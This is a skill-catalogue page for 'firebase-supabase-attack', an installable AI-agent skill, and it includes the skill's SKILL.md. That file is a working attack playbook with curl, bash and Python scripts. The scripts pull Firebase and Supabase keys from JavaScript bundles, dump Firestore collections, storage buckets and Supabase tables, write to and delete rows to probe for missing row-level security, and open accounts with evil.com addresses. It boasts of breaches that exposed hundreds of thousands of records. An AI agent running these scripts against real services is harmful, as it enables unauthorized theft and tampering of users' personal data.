firebase-supabase-attack
Exploit Firebase/Supabase for data via JS config leak probe.
Install / Use
npx skills add uphiago/recon-skills --skill firebase-supabase-attackInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
SecuritySupported Platforms
Our assessment of firebase-supabase-attack
firebase-supabase-attack scores 90/100 on our quality scale, 458th of 971 Security skills we index (top 48%).
Its SKILL.md is 14 KB long, well organised into 34 sections with 9 code examples: a thorough specification that gives an agent plenty to work with.
With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.
Maintenance, license and trust
- The repository was last updated 29 days ago, so firebase-supabase-attack is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
firebase-supabase-attack compared with similar skills
All 4 of these similar skills score higher than firebase-supabase-attack; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| firebase-supabase-attack (this skill)by uphiago | 90 | 1.3k | 29d ago | SKILL.md |
| Agent-Reachby Panniantong | 100 | 86.6k | 15d ago | CLAUDE.md |
| headroomby headroomlabs-ai | 100 | 74.2k | today | CLAUDE.md |
| Scraplingby D4Vinci | 100 | 84.8k | today | MCP Server |
| crawl4aiby unclecode | 100 | 84.6k | 6d ago | MCP Server |
Frequently asked questions
- How do I install firebase-supabase-attack?
- Run
npx skills add uphiago/recon-skills --skill firebase-supabase-attack. The install tabs above show the steps for each supported agent. - Which AI agents does firebase-supabase-attack work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is firebase-supabase-attack safe to use?
- It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is firebase-supabase-attack still maintained?
- The repository was last updated 29 days ago, so firebase-supabase-attack is actively maintained.
Skill content
View source on GitHubname: firebase-supabase-attack description: Exploit Firebase/Supabase for data via JS config leak probe. version: 1.1.0 revision_date: 2026-07-25 license: MIT platforms: [linux] compatibility: Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei tags: [recon, firebase, supabase, firestore, cloud, data-breach] category: recon related_skills:
- api-noauth-hunt
- js-secrets-extraction
- source-leak-hunt
Firebase & Supabase Attack Skill
Exploit misconfigured Firebase (Firestore, Storage, Auth) and Supabase (REST API, Storage, Auth) backends. These BaaS platforms are the #1 source of massive data breaches in modern web apps when Row Level Security (RLS) is missing and API keys leak in JavaScript bundles. Confirmed on delivery-platform (204K WhatsApp conversations, 173K phone numbers), visa-processing-platform (64K users, 46K reports), fitness-chain (39K users, 5 Firebase projects, 21 credentials), dental-booking (9 clinics, 1,749 leads).
When to Use
- JavaScript bundle analysis reveals Firebase config (
apiKey,projectId) or Supabase URL + anon key. - Target uses a modern SPA (React, Vue, Angular) with BaaS backend.
- After
js-secrets-extractionfinds Firebase/Supabase identifiers. - After
source-leak-huntfinds.envwithFIREBASE_*orSUPABASE_*variables.
Prerequisites
terminalwith curl, python3, jq.- Firebase project ID or Supabase URL + anon key (from JS bundle, source leak, or recon).
- For Firebase SA key exploitation:
python3withgoogle-authlibrary.
How to Run
# Firebase Firestore — list collections (if public)
curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/PROJECT_ID/databases/(default)/documents/"
# Supabase — list users table (if RLS missing)
curl --max-time 30 --connect-timeout 10 -sk "https://PROJECT.supabase.co/rest/v1/users" \
-H "apikey: ANON_KEY" -H "Authorization: Bearer ANON_KEY"
# Supabase — test signup (if open)
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://PROJECT.supabase.co/auth/v1/signup" \
-H "apikey: ANON_KEY" -H "Content-Type: application/json" \
-d '{"email":"test@evil.com","password":"Test123!"}'
Quick Reference
| Platform | What to Find | Exploit Path | Real Example | |----------|-------------|-------------|--------------| | Firebase Firestore | Public database rules | Direct REST API access, list all collections | delivery-platform: 204K conversations public | | Firebase Storage | Public bucket rules | Download all files via REST API | delivery-platform: 1,000+ WhatsApp audio files public | | Firebase Auth | Open signup | Create accounts, access protected resources | fitness-chain: Firebase Auth signup open | | Firebase SA Key | Service account JSON | GCP IAM escalation, access all GCP resources | fitness-chain: 5 SA keys → full GCP access | | Supabase REST | Missing RLS | SELECT/INSERT/UPDATE/DELETE on any table | visa-processing-platform: 64K users, 46K reports, DELETE confirmed | | Supabase Storage | Public buckets | Download all files, upload malicious content | visa-processing-platform: public PDF reports bucket | | Supabase Auth | Open signup | Create accounts, bypass access controls | dental-booking: open signup + auto-confirm |
Procedure
Phase 1 — Extract Configuration from JS Bundles
TARGET="$1"
OUTDIR="$OUTDIR/firebase_supabase/$TARGET"
mkdir -p "$OUTDIR"
# Download homepage and common JS entry points
curl --max-time 30 --connect-timeout 10 -sk "https://$TARGET/" -o "$OUTDIR/index.html"
curl --max-time 30 --connect-timeout 10 -sk "https://$TARGET/app.js" -o "$OUTDIR/app.js" 2>/dev/null
curl --max-time 30 --connect-timeout 10 -sk "https://$TARGET/main.js" -o "$OUTDIR/main.js" 2>/dev/null
echo "[*] Extracting Firebase/Supabase configs..."
# Firebase config pattern
grep -Eo 'apiKey["\s:]+["][^"]+["]|projectId["\s:]+["][^"]+["]|firebase\.initializeApp' \
"$OUTDIR"/*.html "$OUTDIR"/*.js 2>/dev/null | sort -u
# Supabase config pattern
grep -Eo 'supabase\.co[^"'\'' ]+|supabaseUrl["\s:]+["][^"]+["]|supabaseKey["\s:]+["][^"]+["]|anon[_-]?key["\s:=]+["][^"]{20,}["]' \
"$OUTDIR"/*.html "$OUTDIR"/*.js 2>/dev/null | sort -u
Phase 2 — Firebase Firestore Exploitation
PROJECT_ID="$1" # e.g., delivery-bot-platform
echo "[*] Firestore enumeration for $PROJECT_ID"
# List root collections (if public)
curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/" | \
python3 -c "
import sys, json
try:
data = json.load(sys.stdin)
if 'documents' in data:
print(f'ERROR: {len(data[\"documents\"])} root docs — not a collection list')
else:
for k in data.keys():
print(f'Collection: {k}')
except Exception as e:
print(f'Error: {e}')
print(sys.stdin.read()[:500])
" 2>/dev/null
# If Firestore requires auth, try with Firebase ID token from Auth
# (see Phase 4 for token generation via signup)
Phase 3 — Firestore Collection & Document Access
PROJECT_ID="$1"
COLLECTION="$2" # e.g., conversationsV3, users, stores
echo "[*] Accessing collection: $COLLECTION"
# List documents in collection
curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/$COLLECTION" | \
python3 -c "
import sys, json
data = json.load(sys.stdin)
if 'documents' in data:
print(f'Documents found: {len(data[\"documents\"])}')
for doc in data['documents'][:5]:
name = doc['name'].split('/')[-1]
fields = doc.get('fields', {})
# Extract top-level fields
keys = list(fields.keys())[:10]
print(f' {name}: {keys}')
if len(data['documents']) > 5:
print(f' ... and {len(data[\"documents\"]) - 5} more')
elif 'error' in data:
print(f'Error: {data[\"error\"][\"message\"]}')
" 2>/dev/null
# Read a specific document
DOC_ID="$3" # from the listing above
curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/$COLLECTION/$DOC_ID" | \
python3 -m json.tool 2>/dev/null | head -50
Phase 4 — Firebase Auth Signup & Token Generation
API_KEY="$1" # from JS bundle (web API key)
PROJECT_ID="$2"
echo "[*] Testing Firebase Auth signup on $PROJECT_ID"
# Sign up
SIGNUP_RESP=$(curl --max-time 30 --connect-timeout 10 -sk -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=$API_KEY" \
-H "Content-Type: application/json" \
-d '{"email":"test-'$(date +%s)'@evil.com","password":"TestPass123!","returnSecureToken":true}')
if echo "$SIGNUP_RESP" | grep -q "idToken"; then
echo "[+] SIGNUP OPEN — account created!"
ID_TOKEN=$(echo "$SIGNUP_RESP" | python3 -c "import sys,json; print(json.load(sys.stdin)['idToken'])" 2>/dev/null)
echo " ID Token: ${ID_TOKEN:0:50}..."
# Now use this token with Firestore
echo "[*] Testing Firestore access with ID token..."
curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/" \
-H "Authorization: Bearer $ID_TOKEN" | python3 -c "
import sys, json
data = json.load(sys.stdin)
if 'documents' in data:
print(f'[+] ACCESS GRANTED — {len(data[\"documents\"])} collections visible')
elif 'error' in data:
print(f'[-] Access denied: {data[\"error\"][\"message\"]}')
else:
print(f'[?] Unknown response: {list(data.keys())}')
" 2>/dev/null
else
echo "[-] Signup blocked: $(echo "$SIGNUP_RESP" | python3 -c "import sys,json; print(json.load(sys.stdin).get('error',{}).get('message','unknown'))" 2>/dev/null)"
fi
Phase 5 — Firebase Storage Enumeration
PROJECT_ID="$1"
BUCKET="${PROJECT_ID}.appspot.com" # default bucket name
echo "[*] Storage enumeration for $BUCKET"
# List objects (if public)
curl --max-time 30 --connect-timeout 10 -sk "https://storage.googleapis.com/storage/v1/b/$BUCKET/o" | \
python3 -c "
import sys, json
data = json.load(sys.stdin)
if 'items' in data:
total = len(data['items'])
total_size = sum(int(i.get('size', 0)) for i in data['items'])
print(f'Objects: {total} ({total_size:,} bytes)')
for item in data['items'][:5]:
print(f' {item[\"name\"]} ({item.get(\"size\",0):,} bytes)')
elif 'error' in data:
print(f'Error: {data[\"error\"][\"message\"]}')
"
# Download a specific file
OBJECT_NAME="$2" # from listing
curl --max-time 30 --connect-timeout 10 -sk "https://storage.googleapis.com/storage/v1/b/$BUCKET/o/$OBJECT_NAME?alt=media" \
-o "/tmp/firebase_$OBJECT_NAME"
echo "[+] Downloaded to /tmp/firebase_$OBJECT_NAME"
Phase 6 — Supabase REST API Exploitation
SUPABASE_URL="$1" # e.g., https://gfgmuezavgzjmaxhflsu.supabase.co
ANON_KEY="$2" # from JS bundle
echo "[*] Supabase REST API enumeration"
# Schema discovery — list tables by querying common names
TABLES=("users" "profiles" "organizations" "posts" "comments" "purchases"
"orders" "products" "reports" "relatorios" "documents" "files"
"messages" "conversations" "sessions" "audit_logs")
for table in "${TABLES[@]}"; do
code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 5 --connect-timeout 5 \
"$SUPABASE_URL/rest/v1/$table?limit=1" \
-H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" 2>/dev/null)
if [[ "$code" == "200" ]]; then
count=$(curl --max-time 30 --connect-timeout 10 -sk "$SUPABASE_URL/rest/v1/$table?limit=0" \
-H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" \
-H "Prefer: count=exact" -I 2>/dev/null | grep -i "content-range" | grep -Eo '\d+(?=/\d+$)')
echo " [TABLE] $table — HTTP 200 (${count:-?} rows)"
# Fetch first 3 rows
curl --max-time 30 --connect-timeout 10 -sk "$SUPABASE_URL/rest/v1/$table?limit=3" \
-H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" | \
python3 -m json.tool 2>/dev/null | head -20
echo ""
elif [[ "$code" == "401" || "$code" == "403" ]]; then
echo " [BLOCKED] $table — HTTP $code (RLS protected)"
fi
done
Phase 7 — Supabase CRUD Testing (RLS Bypass)
SUPABASE_URL="$1"
ANON_KEY="$2"
TABLE="$3" # from table discovery above
echo "[*] CRUD testing on $TABLE"
# INSERT
echo -n " INSERT: "
curl --max-time 30 --connect-timeout 10 -sk -X POST "$SUPABASE_URL/rest/v1/$TABLE" \
-H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" \
-H "Content-Type: application/json" -H "Prefer: return=minimal" \
-d '{"test":"rls_bypass_probe_'$(date +%s)'"}' \
-o /dev/null -w "%{http_code}" 2>/dev/null
echo ""
# UPDATE (PATCH)
echo -n " UPDATE: "
curl --max-time 30 --connect-timeout 10 -sk -X PATCH "$SUPABASE_URL/rest/v1/$TABLE?test=eq.RLS_BYPASS" \
-H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" \
-H "Content-Type: application/json" -H "Prefer: return=minimal" \
-d '{"test":"rls_updated"}' \
-o /dev/null -w "%{http_code}" 2>/dev/null
echo ""
# DELETE
echo -n " DELETE: "
curl --max-time 30 --connect-timeout 10 -sk -X DELETE "$SUPABASE_URL/rest/v1/$TABLE?test=eq.RLS_BYPASS" \
-H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" \
-H "Prefer: return=minimal" \
-o /dev/null -w "%{http_code}" 2>/dev/null
echo ""
Phase 8 — Supabase Auth Signup
SUPABASE_URL="$1"
ANON_KEY="$2"
echo "[*] Supabase Auth signup test"
SIGNUP_RESP=$(curl --max-time 30 --connect-timeout 10 -sk -X POST "$SUPABASE_URL/auth/v1/signup" \
-H "apikey: $ANON_KEY" -H "Content-Type: application/json" \
-d '{"email":"test-'$(date +%s)'@evil.com","password":"TestPass123!"}')
if echo "$SIGNUP_RESP" | grep -q "access_token"; then
echo "[+] SIGNUP OPEN!"
ACCESS_TOKEN=$(echo "$SIGNUP_RESP" | python3 -c "import sys,json; print(json.load(sys.stdin)['access_token'])" 2>/dev/null)
echo " Access Token: ${ACCESS_TOKEN:0:50}..."
# Test cross-org access (change organization_id in profile)
curl --max-time 30 --con
Truncated for display — read the full file on GitHub.
Related Skills
Agent-Reach
86.6kGive your AI agent eyes to see the entire internet. Read & search Twitter, Reddit, YouTube, GitHub, Bilibili, XiaoHongShu — one CLI, zero API fees.
headroom
74.2kCompress tool outputs, logs, files, and RAG chunks before they reach the LLM. 20% fewer tokens for coding agents, 60-95% fewer tokens for JSON, same answers. Library, proxy, MCP server.
Scrapling
84.8k🕷️ An adaptive Web Scraping framework that handles everything from a single request to a full-scale crawl! Don't be shy, join here: https://discord.gg/EMgGbDceNQ and follow here for daily tips and tricks: https://x.com/Scrapling_dev
crawl4ai
84.6kOpen-source web crawler and scraper for LLMs and AI agents: any website into clean, LLM-ready Markdown. Run it yourself, or use Crawl4AI Cloud with one key.
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
